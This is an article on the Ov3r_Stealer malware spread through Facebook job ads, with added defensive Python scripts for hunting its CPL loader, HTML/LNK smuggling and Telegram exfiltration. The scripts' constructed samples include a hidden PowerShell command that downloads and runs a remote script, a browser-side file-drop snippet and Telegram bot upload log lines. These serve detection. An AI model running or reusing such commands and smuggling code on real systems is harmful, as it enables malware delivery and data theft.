Have You Noticed Job Ads Roaming Around Facebook? Beware of the Ov3r_Stealer Malware

Recently, as I was going through my Facebook feed, I noticed a lot of job advertisements for various positions, mainly account manager. When I applied, they sent back queries asking for my mobile number and WhatsApp messages.

Researchers first discovered the stealer in early December.

It was being spread via a Facebook job advertisement for an account manager position, the researchers revealed in a blog post and report published this week. Later, they discovered that the actors behind the malware also use other Facebook-based scams, including the creation of fake accounts, to spread it.

The Novel Stealer Malware Called "Ov3r_Stealer" and How It Works

A novel stealer malware called “Ov3r_Stealer” is making the rounds on Facebook, spreading through job ads and accounts on the social media platform, and using various execution methods to steal reams of data from unwitting victims.

The malware by design exfiltrates specific types of data such as geolocation (based on IP), hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Office documents, and antivirus product information, according to researchers from Trustwave SpiderLabs.

  • It sends the stolen data to a Telegram channel monitored by the threat actors.
  • The threat actors behind the malware also use Facebook-based scams, including the creation of fake accounts, to spread it.
  • Weaponized links delivered through the ad lead to a malicious Discord content-delivery URL. From there, a PowerShell script masquerading as a Windows Control Panel (CPL) file acts as the loader, downloading the malware as three files from a GitHub repository.
  • The researchers found that Ov3r_Stealer has several execution methods.
  • In addition to the PowerShell vector, Ov3r_Stealer can also be executed on a victim's machine via HTML smuggling, SVG image smuggling, and .LNK shortcut files masquerading as innocuous text documents.
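As an added hunting example (my own code, not from the Trustwave report or this page), the loader chain in the list above can be expressed as a rule over process-creation telemetry: PowerShell launched by a Control Panel host (control.exe or rundll32.exe), a command line that references a .cpl file, a hidden window, and a download from the Discord CDN or GitHub. The event layout (Sysmon Event ID 1 field names), the hostnames cdn.discordapp.com and raw.githubusercontent.com, and the sample events themselves are assumptions constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

POWERSHELL = ("powershell.exe", "pwsh.exe")
# Processes that legitimately host Control Panel (.cpl) items. A "CPL" that is
# really a PowerShell loader ends up with one of these as its parent.
CPL_HOSTS = ("control.exe", "rundll32.exe")
# Download sources named on the page (Discord CDN, GitHub). The exact
# hostnames are an assumption, not taken from the report.
DOWNLOAD_HOSTS = re.compile(
    r"https?://(cdn\.discordapp\.com|raw\.githubusercontent\.com|github\.com)/",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
CPL_REF = re.compile(r"\.cpl\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons a process-creation event resembles the CPL loader chain."""
    reasons: List[str] = []
    if basename(ev.get("Image", "")) not in POWERSHELL:
        return reasons
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if parent in CPL_HOSTS:
        reasons.append(f"PowerShell spawned by Control Panel host {parent}")
    if CPL_REF.search(cmd):
        reasons.append("command line references a .cpl file")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    for m in DOWNLOAD_HOSTS.finditer(cmd):
        reasons.append(f"download from {m.group(1).lower()}")
    return reasons


def hunt(events: List[Dict[str, str]]) -> Dict[str, Tuple[str, List[str]]]:
    """Map ProcessId -> (severity, reasons).

    One indicator alone is weak (plenty of admins fetch scripts from GitHub),
    so a single reason is 'low' and two or more stacked reasons are 'high'.
    """
    out: Dict[str, Tuple[str, List[str]]] = {}
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            out[ev["ProcessId"]] = ("high" if len(reasons) >= 2 else "low", reasons)
    return out


# Constructed events in Sysmon Event ID 1 shape; none of these are real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"ProcessId": "1002", "Image": PS, "ParentImage": r"C:\Windows\System32\control.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c IEX((New-Object Net.WebClient)"
                    ".DownloadString('https://raw.githubusercontent.com/example/repo/main/stage2'))"},
    {"ProcessId": "1003", "Image": PS, "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"powershell.exe -c & 'C:\Users\victim\Downloads\job_offer.cpl' "
                    "https://cdn.discordapp.com/attachments/1/2/x"},
    {"ProcessId": "1004", "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest https://github.com/PowerShell/PowerShell/releases"},
]

if __name__ == "__main__":
    for pid, (severity, why) in hunt(SAMPLE_EVENTS).items():
        print(pid, severity, "; ".join(why))
```

Event 1004 deliberately trips only the GitHub indicator and scores low; in a real environment the low tier is what you baseline away, while the high tier (1002 and 1003) goes straight to triage.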

Leading Down a Rabbit Hole

Once researchers followed the stolen data to Telegram, they found a rather complex origin story behind Ov3r_Stealer, as the malware appears to have a range of threat actors behind it who conspire via multiple communication channels and platforms.

Specifically, the researchers uncovered various pseudonyms, communication channels, and repositories for the stolen data that hold clues to who’s behind it and how they work.

“Aliases such as ‘Liu Kong,’ ‘MR Meta,’ MeoBlackA, and ‘John Macollan’ were found in groups like ‘Pwn3rzs Chat,’ ‘Golden Dragon Lounge,’ ‘Data Pro,’ and ‘KGB Forums,’ where many ‘researchers,’ threat actors, and curious folk gather, meetup, and exchange hacks, malware, and cracked software daily,” according to the report.

It's unknown exactly how the attackers use the data once it's stolen, but possibilities include selling it or using it for phishing.

Ov3r_Stealer’s Various Execution Strategies

As mentioned, the stealer reaches execution on a victim's machine through several distinct methods; the researchers observed one of them (the PowerShell loader masquerading as a CPL file, described above) in the wild and gleaned the others from sample code.

Another method, indicated by sample data, is HTML smuggling: a weaponized HTML file, CustomCursor.html, decodes and drops the CustomCursor.zip archive, which contains the malware files, from inside the victim's browser.

A third execution method is through a shortcut file (.LNK). The victim is presented with a file masquerading as a typical text file called Attitude_Reports.txt, located within a zip archive. The actual file within the zip archive, however, is a malicious .LNK file called Attitude_Reports.txt.lnk. Once opened, it will redirect the victim to the GitHub repository, as the CPL loader does, to download the actual payload.

Attackers also use SVG smuggling, in which the payload is carried inside an SVG image, combined with exploitation of the WinRAR code-execution vulnerability CVE-2023-38831 to execute the file.
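An added static-triage example covering the HTML smuggling and .LNK methods described in the two passages above (my own code, not from the report): it walks a zip archive, flags shortcuts whose double extension poses as a document (the report's Attitude_Reports.txt.lnk name), flags files that carry a Shell Link header under a non-.lnk name, and flags HTML or SVG files that combine the JavaScript idioms a smuggled drop needs (atob, Blob, createObjectURL, a download attribute) with a long base64 payload. The sample archive and its HTML are constructed for illustration and are not artifacts from the campaign.

```python
import io
import re
import zipfile
from typing import Dict, List

# Shell Link (.lnk) files start with HeaderSize 0x0000004C followed by the
# LinkCLSID {00021401-0000-0000-C000-000000000046} in little-endian GUID layout.
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
DOC_EXTS = (".txt", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf")
# JavaScript idioms an HTML/SVG smuggling page needs to rebuild a file client-side.
SMUGGLING_MARKERS = {
    "atob": re.compile(r"\batob\s*\(", re.I),
    "Blob": re.compile(r"new\s+Blob\s*\(", re.I),
    "createObjectURL": re.compile(r"createObjectURL\s*\(", re.I),
    "download attr": re.compile(r"\bdownload\s*=", re.I),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def is_lnk(data: bytes) -> bool:
    """True if the bytes begin with a Shell Link header, whatever the file is named."""
    return data.startswith(LNK_HEADER)


def name_reasons(name: str, data: bytes) -> List[str]:
    reasons = []
    lower = name.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(DOC_EXTS):
        reasons.append("shortcut with double extension posing as a document")
    if is_lnk(data) and not lower.endswith(".lnk"):
        reasons.append("LNK header under a non-.lnk name")
    return reasons


def smuggling_reasons(name: str, data: bytes) -> List[str]:
    if not name.lower().endswith((".html", ".htm", ".svg")):
        return []
    text = data.decode("utf-8", errors="ignore")
    hits = [k for k, rx in SMUGGLING_MARKERS.items() if rx.search(text)]
    blob = BASE64_BLOB.search(text)
    # One marker alone (a page using atob for a token, say) is not smuggling;
    # require the decode-and-save pattern plus an embedded payload.
    if len(hits) >= 3 and blob:
        return [f"client-side file drop ({', '.join(hits)}); "
                f"{len(blob.group())}-char base64 payload"]
    return []


def triage_archive(zip_bytes: bytes) -> Dict[str, List[str]]:
    """Map each suspicious member name in the archive to its reasons."""
    findings: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            reasons = name_reasons(info.filename, data) + smuggling_reasons(info.filename, data)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample archive; the contents are not artifacts from the report."""
    html = (
        "<html><body><script>\n"
        'var b64 = "UEsDBBQAAAAIAA' + "A" * 120 + '";\n'   # fake zip-looking base64
        "var bin = atob(b64); var u8 = new Uint8Array(bin.length);\n"
        "for (var i = 0; i < bin.length; i++) u8[i] = bin.charCodeAt(i);\n"
        'var blob = new Blob([u8], {type: "application/zip"});\n'
        'var a = document.createElement("a"); a.href = URL.createObjectURL(blob);\n'
        'a.download = "CustomCursor.zip"; a.click();\n'
        "</script></body></html>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Attitude_Reports.txt.lnk", LNK_HEADER + b"\x00" * 56)
        zf.writestr("Notes.txt", b"quarterly notes, nothing to see")
        zf.writestr("CustomCursor.html", html.encode())
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in triage_archive(build_sample_archive()).items():
        print(member, "->", "; ".join(why))
```

The header check matters because Explorer hides the .lnk extension by default, so a user sees "Attitude_Reports.txt" regardless of the real name; checking the bytes rather than the name catches the same trick when the attacker drops the double extension altogether.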

A Malware Poised to Go Big

The researchers believe the malware remains under active development, poses a continuing threat, and could grow in scale. They included a comprehensive list of indicators of compromise (IoCs) in their report to help organizations identify the malware in their environments.

“As Ov3r_Stealer has been actively developed with multiple loader techniques, we may see this one eventually be sold or used in other campaigns in the future,” according to the report.

What Organizations Must Do

Organizations should regularly audit and baseline their applications and services, and keep application patching up to date, to mitigate such threats, the researchers added.

Further, they should continuously hunt for threats throughout their environments to pick up undetected compromises before they have time to do damage.
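As an added example of that continuous hunting (my own code, not from the report), the page's one firm detail about the exfiltration channel, that loot goes to a Telegram channel, gives a concrete rule for proxy logs: any non-messaging process posting to the Telegram Bot API upload methods is worth a look. The log layout, the process and host names, the timestamps and the bot token are constructed for illustration; only the Bot API URL shape (https://api.telegram.org/bot<token>/<method>) is Telegram's real format.

```python
import re
from typing import Dict, List, Optional

# Constructed proxy-log layout: timestamp, client IP, process, method, URL, bytes sent.
LOG_RX = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<proc>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<bytes>\d+)$"
)
# Telegram Bot API URL shape. The token is <bot_id>:<secret>; we keep only bot_id
# in findings so the full credential is not copied into tickets and dashboards.
BOT_API = re.compile(
    r"https://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<call>\w+)"
)
# Methods a stealer would use to push loot into a channel.
EXFIL_CALLS = {"sendDocument", "sendMessage", "sendPhoto"}
# Processes that talk to Telegram legitimately; anything else driving a bot is suspect.
EXPECTED_CLIENTS = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Constructed sample lines; the token is fake.
SAMPLE_LOG = """\
2024-01-01T10:15:02Z 10.0.0.12 chrome.exe GET https://web.telegram.org/k/ 2310
2024-01-01T10:15:40Z 10.0.0.12 powershell.exe POST https://api.telegram.org/bot123456789:AAFakeTokenForIllustration/sendDocument 48211
2024-01-01T10:16:01Z 10.0.0.12 updater.exe POST https://api.telegram.org/bot123456789:AAFakeTokenForIllustration/sendMessage 512
2024-01-01T10:16:30Z 10.0.0.7 telegram.exe POST https://api.telegram.org/bot987654321:AAAnotherFakeToken/getUpdates 120
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RX.match(line.strip())
    return m.groupdict() if m else None


def hunt_telegram_exfil(log_text: str) -> List[dict]:
    """Return one finding per upload to a Telegram bot from an unexpected process."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        api = BOT_API.search(rec["url"])
        if not api or api.group("call") not in EXFIL_CALLS:
            continue
        if rec["proc"].lower() in EXPECTED_CLIENTS:
            continue
        findings.append({
            "ts": rec["ts"], "src": rec["src"], "proc": rec["proc"],
            "bot_id": api.group("bot_id"), "call": api.group("call"),
            "bytes": int(rec["bytes"]),
        })
    return findings


if __name__ == "__main__":
    for f in hunt_telegram_exfil(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['proc']} -> bot {f['bot_id']} {f['call']} ({f['bytes']} bytes)")
```

Two caveats a hunter should keep in mind: the secret half of the token is evidence (it identifies the attacker's bot and can be reported to Telegram), so preserve the raw log line separately even though the finding redacts it; and a bot that only polls getUpdates is not exfiltrating, which is why that call is not in EXFIL_CALLS.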

(Image courtesy: Geeksadvice)
